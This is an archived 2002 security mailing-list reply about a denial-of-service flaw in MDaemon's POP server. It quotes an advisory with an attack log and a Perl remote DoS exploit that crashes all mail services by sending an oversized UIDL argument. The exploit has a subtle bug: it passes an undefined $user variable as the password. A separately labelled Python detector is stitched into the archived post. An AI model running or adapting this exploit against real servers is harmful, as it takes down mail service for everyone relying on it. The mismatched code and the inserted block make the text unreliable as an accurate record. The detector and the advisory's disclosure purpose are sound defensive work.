Re: MDaemon SMTP/POP/IMAP server DoS

From: Muhammad Faisal Rauf Danka (mfrdat_private)
Date: Mon Oct 28 2002 - 16:57:05 PST

    There have been earlier issues with UIDL and DoS conditions in MDaemon 2.8.5.0 (to be specific). 
    Check bid 1366, http://online.securityfocus.com/bid/1366/
    
    The website still offers the 6.0.7 (vulnerable) version for download,
    so apparently no workaround exists except for shutting it down until
    the patch or newer version is available.
    
    
    Regards
    --------
    Muhammad Faisal Rauf Danka
    
    Head of GemSEC / Chief Technology Officer
    Gem Internet Services (Pvt) Ltd.
    web: www.gem.net.pk
    Key Id: 0x784B0202
    Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
    784B 0202
    
    
    --- D4rkGr3y <grey_1999at_private> wrote:
    >######################################################
    >#Product: MDaemon SMTP/POP/IMAP server               #
    >#Authors: Alt-N Technologies Ltd [www.mdaemon.com]   #
    >#Vulnerable versions: v.6.0.7 and below              #
    >#Vulnerability: buffer overflow                      #
    >#Bug&exploit by D4rkGr3y [www.dhgroup.org]           #
    >######################################################
    >
    >#Overview#--------------------------------------------------------------#
    >From MDaemon's help file:
    >"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
    >commonplace on UNIX hosts and the Internet to Windows based servers
    >and microcomputers. MDaemon is designed to manage the email needs of
    >any number of individual users and comes complete with a powerful set
    >of integrated tools for managing mail accounts and message formats.
    >MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
    >with LDAP support, an integrated browser-based email client, content
    >filtering, spam blockers, extensive security features, and more."
    >
    >#Problem#----------------------------------------------------------------#
    >Bug found in MDaemon's pop-server. It's possible to kill MDaemon by
    >sending long arguments (32b and above) with DELE or UIDL commands.
    >To do this you must have at least a mail account on the vulnerable host.
    >After getting a long request from the client, all MDaemon's services will be
    >closed (smtp, imap, pop, (?)worldclient).
    >Here the log of attack on local MDaemon POP-server:
    >
    >+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210
    >271036.AA3656130MD0012at_private>
    >USER D4rkGr3y
    >+OK D4rkGr3y... Recipient ok
    >PASS cool-pass
    >+OK D4rkGr3yat_private's mailbox has 1 total messages (18356 octets).
    >UIDL 11111111111111111111111111111111
    >
    >Connection to host lost...
    >
    >#Exploit#----------------------------------------------------------------#
    >
    >#!/usr/bin/perl
    >#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
    >use IO::Socket;
    >$host = "[vuln_host]";
    >$login = "[login]";
    >$pass = "[pass]";
    >$port = "110";
    >$data = "1";
    >$num = "32";
    >$buf .= $data x $num;
    >$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM)
    >or die "Couldn't connect: @!\n";
    >print $socket "USER $login\n";
    >print $socket "PASS $user\n";
    >print $socket "UIDL $buf\n";
    >close($socket);
    >
    >#EOF
    >
    >Best regards               www.dhgroup.org
    >  D4rkGr3y                    icq 540981
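
A defender-side check for the condition reported above, as an added example that is not part of either poster's message or of MDaemon: it classifies POP3 client lines as they might be seen by a filtering proxy or in a session log, alerting on DELE/UIDL arguments of 32 bytes and above and rejecting message numbers that cannot exist in the mailbox. The function names, verdict strings and sample session are assumptions constructed for illustration.

```python
# Added example: names and the sample session are constructed, not from MDaemon.
LONG_ARG_BYTES = 32          # threshold stated in the advisory
WATCHED = {"DELE", "UIDL"}   # commands the advisory names


def check_pop3_line(line: bytes, mailbox_count: int) -> str:
    """Return 'ok', 'reject' (malformed) or 'alert' (matches the advisory)."""
    parts = line.rstrip(b"\r\n").split(b" ")
    keyword = parts[0].upper().decode("ascii", "replace")
    if keyword not in WATCHED:
        return "ok"                      # other commands are out of scope here
    args = [p for p in parts[1:] if p]
    if any(len(a) >= LONG_ARG_BYTES for a in args):
        return "alert"                   # drop the line and log the account
    if len(args) > 1 or (keyword == "DELE" and not args):
        return "reject"                  # DELE takes one msg number, UIDL at most one
    for a in args:
        # A message number is decimal and must exist in the mailbox.
        if not a.isdigit() or not 1 <= int(a) <= mailbox_count:
            return "reject"
    return "ok"


def review_session(lines, mailbox_count):
    """Return (line_number, verdict) for every line that is not 'ok'."""
    findings = []
    for number, line in enumerate(lines, start=1):
        verdict = check_pop3_line(line, mailbox_count)
        if verdict != "ok":
            findings.append((number, verdict))
    return findings


# Constructed session modelled on the log in the advisory (1 message in mailbox).
SAMPLE_SESSION = [
    b"USER someuser\r\n",
    b"PASS not-a-real-password\r\n",
    b"UIDL\r\n",
    b"DELE 1\r\n",
    b"DELE 7\r\n",
    b"UIDL " + b"1" * 32 + b"\r\n",
]

if __name__ == "__main__":
    for number, verdict in review_session(SAMPLE_SESSION, mailbox_count=1):
        print(number, verdict)
```

Because the advisory requires a valid account, an alert here identifies the authenticated user who sent the oversized argument.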
    
    



    This archive was generated by hypermail 2b30 : Tue Oct 29 2002 - 14:45:22 PST